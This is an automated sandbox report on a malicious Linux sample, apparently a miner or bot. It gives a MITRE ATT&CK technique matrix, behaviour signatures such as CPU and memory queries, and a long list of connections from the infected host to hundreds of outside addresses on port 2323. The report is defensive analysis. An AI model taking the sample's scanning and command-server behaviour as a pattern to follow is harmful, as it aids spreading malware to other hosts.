
Analysis Report agJPi4fCrP

Overview

General Information

Joe Sandbox Version: 28.0.0 Lapis Lazuli
Analysis ID: 1019092
Start date: 13.12.2019
Start time: 11:26:28
Joe Sandbox Product: Cloud
Overall analysis duration: 0h 5m 27s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: agJPi4fCrP
Cookbook file name: defaultlinuxfilecookbook.jbs
Analysis system description: CentOS Linux 7.5 x64 (Kernel 3.10.0-862, Firefox 52.8.0, Document Viewer 3.22.1, LibreOffice 5.3.6.1, OpenJDK 1.8.0_171)
Detection: MAL
Classification: mal64.troj.evad.mine.lin@0/2@6/0
Warnings:
  • Report size exceeded maximum capacity and may have missing network information.

Detection

Strategy: Threshold
Score: 64
Range: 0 - 100
Reporting: Report FP / FN
Whitelisted: false
Detection: malicious

Classification

Mitre Att&ck Matrix

Techniques are listed per tactic column; the number in parentheses is the count of matched signatures shown in the original matrix (entries without a number had no matching signature).

Initial Access: Valid Accounts; Replication Through Removable Media; Drive-by Compromise; Exploit Public-Facing Application
Execution: Local Job Scheduling (1); Scripting (1); Windows Management Instrumentation; Scheduled Task
Persistence: Local Job Scheduling (1); Systemd Service (1); Accessibility Features; System Firmware
Privilege Escalation: Port Monitors; Accessibility Features; Path Interception; DLL Search Order Hijacking
Defense Evasion: Scripting (1); Obfuscated Files or Information (1); Rootkit; Obfuscated Files or Information
Credential Access: Credential Dumping (1); Network Sniffing; Input Capture; Credentials in Files
Discovery: Process Discovery (1); Security Software Discovery (1); System Information Discovery (3); System Network Configuration Discovery
Lateral Movement: Remote File Copy (1); Remote Services; Windows Remote Management; Logon Scripts
Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture
Exfiltration: Data Compressed; Exfiltration Over Other Network Medium; Automated Exfiltration; Data Encrypted
Command and Control: Uncommonly Used Port (11); Remote File Copy (1); Standard Non-Application Layer Protocol (2); Standard Application Layer Protocol (12)
Network Effects: Jamming or Denial of Service (11)
Remote Service Effects: (no entries)
Impact: (no entries)

Signature Overview

Bitcoin Miner:

Searches for CPU information (likely indicative for DDoS capability)
Source: /bin/sh (PID: 3191); Executable: /bin/grep -> grep -c ^processor /proc/cpuinfo
Executes the "free" command used for querying memory usage (likely indicative for DDoS or mining capabilities)
Source: /bin/sh (PID: 3205); Free executable: /bin/free -> free
Reads CPU information from /proc indicative of miner or evasive malware
Source: /bin/grep (PID: 3191); Reads CPU info from proc file: /proc/cpuinfo
Reads CPU information from /sys indicative of miner or evasive malware
Source: /bin/free (PID: 3205); Reads CPU info from /sys: /sys/devices/system/cpu/online

Networking:

Uses known network protocols on non-standard ports
Source: unknown; Network traffic detected: HTTP traffic on port 23 -> 58610
Source: unknown; Network traffic detected: HTTP traffic on port 23 -> 58616
Detected TCP or UDP traffic on non-standard ports
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 106.243.152.204:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 45.247.28.204:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 205.100.153.245:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 98.179.130.153:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 130.154.3.180:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 32.56.239.68:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 39.237.7.127:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 196.60.190.167:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 60.162.145.239:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 159.246.132.132:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 162.162.215.6:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 20.33.59.53:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 188.13.68.161:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 193.106.17.177:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 194.239.90.143:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 24.68.252.24:2323
Source: global trafficTCP traffic: 192.168.1.101:48972 -> 173.232.146.101:40000
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 133.84.26.209:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 71.60.190.47:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 162.227.119.37:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 185.179.67.70:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 94.149.159.13:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 68.9.164.137:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 143.248.39.178:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 187.181.189.200:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 102.114.227.177:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 200.233.216.231:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 155.3.36.20:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 222.128.2.70:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 25.60.13.226:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 54.168.34.236:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 190.40.93.27:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 152.109.8.183:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 188.10.193.219:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 202.186.214.41:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 13.68.59.234:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 177.109.235.242:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 41.252.224.234:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 158.149.74.84:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 183.43.149.205:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 86.45.223.17:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 34.232.126.91:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 173.164.32.11:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 53.131.63.181:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 25.76.210.126:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 99.81.66.100:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 140.101.78.31:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 195.250.148.186:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 188.234.14.114:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 183.95.232.78:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 18.32.37.112:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 9.28.119.112:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 69.45.110.134:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 57.46.7.222:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 74.52.38.118:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 62.248.18.50:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 121.70.188.96:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 47.226.42.151:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 196.245.228.81:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 99.239.207.220:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 148.255.206.27:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 193.43.60.44:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 94.68.222.140:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 44.210.80.236:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 207.75.80.217:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 142.6.109.217:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 75.198.133.68:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 14.64.228.134:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 19.181.108.98:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 108.240.191.35:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 221.137.227.70:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 138.215.48.152:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 17.137.205.40:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 24.223.42.77:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 63.131.99.132:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 152.178.212.102:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 59.50.221.43:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 66.28.17.186:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 71.168.61.186:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 80.141.66.205:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 146.138.244.97:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 72.171.33.190:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 209.162.77.25:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 203.154.154.35:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 40.67.150.252:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 143.152.14.180:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 59.247.185.43:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 49.23.122.233:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 202.129.29.174:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 211.30.9.93:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 105.141.128.224:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 2.47.225.163:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 199.109.126.142:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 133.178.123.184:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 2.144.133.94:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 110.212.192.55:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 60.160.233.200:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 156.114.26.166:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 48.236.219.127:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 4.219.240.23:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 50.161.235.154:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 12.144.80.103:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 83.206.4.200:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 119.120.122.147:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 38.139.208.197:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 181.181.40.49:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 91.61.6.114:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 205.159.237.24:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 102.222.77.182:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 40.168.196.78:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 164.113.182.241:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 78.160.93.0:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 81.100.64.242:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 126.4.11.168:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 187.247.88.220:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 78.112.205.64:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 51.219.54.254:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 200.160.218.54:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 203.162.41.140:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 72.252.77.85:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 97.196.104.76:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 144.140.216.183:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 96.147.50.189:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 223.134.95.120:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 53.2.90.92:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 84.80.107.127:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 42.68.244.33:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 197.245.57.248:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 120.33.221.43:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 13.103.231.92:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 168.159.187.168:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 41.97.180.173:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 132.157.113.68:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 162.150.87.117:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 219.54.93.129:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 94.233.215.239:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 45.126.240.9:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 156.59.77.37:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 198.36.197.226:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 95.238.1.189:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 130.104.75.80:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 185.71.191.85:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 168.208.22.229:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 112.231.64.126:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 102.111.81.16:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 44.84.20.0:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 218.133.8.25:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 111.6.68.207:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 37.20.15.167:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 51.133.92.115:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 173.46.3.251:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 94.10.53.212:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 110.114.218.238:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 135.187.6.98:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 200.67.143.79:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 220.140.176.208:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 59.151.175.157:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 31.80.159.238:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 121.50.250.22:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 108.25.40.164:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 62.202.140.161:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 81.15.69.21:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 206.255.211.109:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 120.97.233.64:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 216.61.45.11:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 153.176.95.33:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 139.111.157.13:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 106.46.119.100:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 154.42.132.86:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 67.218.27.131:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 59.109.21.235:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 223.148.160.93:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 50.126.215.88:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 182.31.245.237:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 19.240.203.99:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 176.25.197.48:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 169.70.161.15:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 202.35.204.50:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 221.143.213.160:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 218.237.52.237:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 211.146.229.118:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 69.109.247.211:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 136.0.58.26:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 14.80.61.70:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 158.145.242.165:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 219.229.206.66:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 67.130.124.63:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 45.225.60.5:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 103.195.201.91:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 88.245.60.20:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 153.192.162.57:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 38.203.92.179:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 148.165.167.230:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 140.180.190.213:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 41.56.53.248:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 177.79.95.185:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 100.184.112.245:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 112.5.72.48:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 196.249.229.53:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 48.43.206.197:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 81.210.251.188:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 168.131.233.14:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 160.199.100.149:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 178.44.92.52:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 178.137.12.118:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 54.43.175.126:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 18.254.24.175:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 169.13.195.8:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 156.92.193.138:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 175.158.50.123:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 141.133.200.180:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 178.171.162.82:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 159.54.216.194:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 161.223.205.3:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 101.200.7.83:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 37.63.254.190:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 106.62.207.176:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 167.84.164.200:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 65.67.103.6:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 218.3.94.196:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 18.244.13.103:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 9.73.54.47:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 187.6.18.250:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 164.119.197.194:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 74.39.94.169:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 74.111.13.128:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 103.167.71.64:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 131.212.32.181:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 213.244.253.229:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 183.235.70.210:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 34.111.44.78:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 44.10.249.20:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 17.109.199.20:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 57.88.251.4:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 219.111.155.153:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 157.223.66.131:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 177.84.2.205:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 124.67.22.145:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 177.96.74.211:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 45.219.177.236:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 72.180.244.135:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 91.232.249.49:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 143.243.36.199:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 96.183.243.237:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 203.41.28.9:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 205.43.123.152:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 85.120.115.48:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 113.178.119.247:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 154.112.96.113:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 47.217.83.216:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 188.211.46.99:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 36.222.242.37:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 142.100.156.97:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 209.192.214.131:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 78.38.214.168:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 176.220.155.153:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 97.193.51.60:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 124.74.233.39:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 142.31.54.56:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 69.42.233.79:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 81.235.243.2:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 62.153.115.163:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 91.90.249.9:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 186.67.6.243:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 83.157.165.118:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 126.228.107.43:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 73.15.91.75:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 188.66.103.26:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 195.130.104.72:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 39.88.216.129:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 70.146.5.189:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 196.9.232.203:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 101.146.97.79:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 84.160.198.117:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 78.118.47.23:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 54.70.192.234:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 112.207.57.20:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 66.34.147.112:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 110.148.205.245:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 152.1.131.241:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 222.146.182.59:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 167.176.166.197:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 75.61.94.101:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 93.18.69.57:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 78.138.186.50:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 87.27.120.240:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 78.139.127.3:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 40.59.15.227:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 58.190.254.176:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 48.94.231.31:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 49.132.136.10:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 219.185.105.97:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 184.7.95.223:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 86.123.242.127:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 123.123.210.245:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 85.135.99.59:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 117.174.187.152:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 1.1.119.140:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 61.46.3.90:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 19.183.110.105:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 125.6.8.224:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 70.217.106.152:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 1.169.240.245:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 169.151.204.148:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 160.82.217.64:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 187.178.59.68:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 125.192.49.61:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 126.190.127.7:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 116.126.209.61:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 178.91.45.140:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 27.67.112.248:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 93.7.156.39:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 51.4.117.47:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 114.97.63.141:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 168.217.111.205:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 140.74.199.227:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 139.188.183.247:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 88.118.214.40:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 168.189.117.40:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 119.181.171.75:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 57.24.234.193:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 118.160.215.165:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 154.218.66.171:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 98.9.226.77:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 54.22.166.157:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 186.66.238.240:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 13.170.16.39:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 1.160.229.48:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 121.87.69.172:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 150.18.97.202:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 100.180.252.45:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 217.241.111.237:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 65.102.13.62:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 105.206.138.222:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 12.116.28.250:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 70.114.112.245:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 46.107.135.133:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 191.246.43.26:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 102.51.97.142:2323
